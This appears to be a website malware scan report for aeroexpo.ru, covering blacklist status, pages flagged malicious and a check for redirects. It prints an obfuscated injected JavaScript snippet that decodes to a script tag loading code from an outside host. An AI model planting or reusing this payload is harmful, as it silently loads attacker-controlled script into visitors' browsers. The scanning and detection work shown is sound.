Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=aeroexpo.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://aeroexpo.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://aeroexpo.ru/ | 200 OK Content-Length: 2172 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- Decode By GamesMir.com Start --> var temp="",i,c=0,out=""; var str="60!115!99!114!105!112!116!32!105!100!61!34!116!111!112!49!48!48!67!111!117!110!116!101!114!34!32!116!121!112!101!61!34!116!101!120!116!47!106!97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!115!105!109!112!108!101!45!102!97!113!46!99!99!47!115!116!97!116!46!106!115!34!62!60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++; out=out+String.fromCharCode(temp);temp="";}document.write(out); <!-- Decode By GamesMir.com End --> Antivirus reports:
| ||
http://aeroexpo.ru/test404page.js | 200 OK Content-Length: 2172 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- Decode By GamesMir.com Start --> var temp="",i,c=0,out=""; var str="60!115!99!114!105!112!116!32!105!100!61!34!116!111!112!49!48!48!67!111!117!110!116!101!114!34!32!116!121!112!101!61!34!116!101!120!116!47!106!97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!115!105!109!112!108!101!45!102!97!113!46!99!99!47!115!116!97!116!46!106!115!34!62!60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++; out=out+String.fromCharCode(temp);temp="";}document.write(out); <!-- Decode By GamesMir.com End --> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: aeroexpo.ru
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=1
Connection: close
Date: Sun, 12 Oct 2014 19:16:31 GMT
Server: Jino.ru/mod_pizza
Content-Length: 2172
Content-Type: text/html
Expires: Sun, 12 Oct 2014 19:16:32 GMT
...2172 bytes of data.
GET / HTTP/1.1
Host: aeroexpo.ru
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=1
Connection: close
Date: Sun, 12 Oct 2014 19:16:31 GMT
Server: Jino.ru/mod_pizza
Content-Length: 2172
Content-Type: text/html
Expires: Sun, 12 Oct 2014 19:16:32 GMT
...2172 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: aeroexpo.ru
Referer: http://www.google.com/search?q=aeroexpo.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: aeroexpo.ru
Referer: http://www.google.com/search?q=aeroexpo.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.